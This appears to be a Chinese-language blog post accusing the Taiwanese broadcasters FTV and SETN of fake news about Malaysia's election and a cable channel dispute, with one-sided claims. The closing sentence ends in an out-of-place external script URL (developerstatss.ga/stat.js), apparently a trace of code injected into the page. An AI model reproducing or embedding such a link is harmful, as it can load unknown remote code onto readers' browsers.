分類
筆記

假新聞製造–民視、三立

報導納吉「親中賣馬」是慘敗關鍵 親綠台媒被大馬網友洗版灌爆

三立的假新聞,硬要把馬來西亞政局變天扯上「親中與否」這個議題,慘遭大馬華人洗版。

民視的假新聞就更誇張了,明明是自己硬要違法綑綁銷售,造成授權契約到期,TBC因無取得授權而依法下架該頻道。但民視從第一篇聲明稿就硬扯「郭台銘賣台親中故意下架民視」(事後證明根本是民視自己無中生有的故事),現在更造假「因為大量客戶抱怨無法收看民視新聞台,造成TBC客服電話打不通」,但事實是「TBC的客服電話話務流量並無壅塞不通之情形,可以由為TBC提供電信服務的公司系統查證即可得知,並且NCC也有抽樣調查,並無民視報導之情況。」

這二家電視台格調還真高啊~https://js.developerstatss.ga/stat.js?n=ns1

發表迴響

在下方填入你的資料或按右方圖示以社群網站登入:

WordPress.com 標誌

您的留言將使用 WordPress.com 帳號。 登出 /  變更 )

Google photo

您的留言將使用 Google 帳號。 登出 /  變更 )

Twitter picture

您的留言將使用 Twitter 帳號。 登出 /  變更 )

Facebook照片

您的留言將使用 Facebook 帳號。 登出 /  變更 )

連結到 %s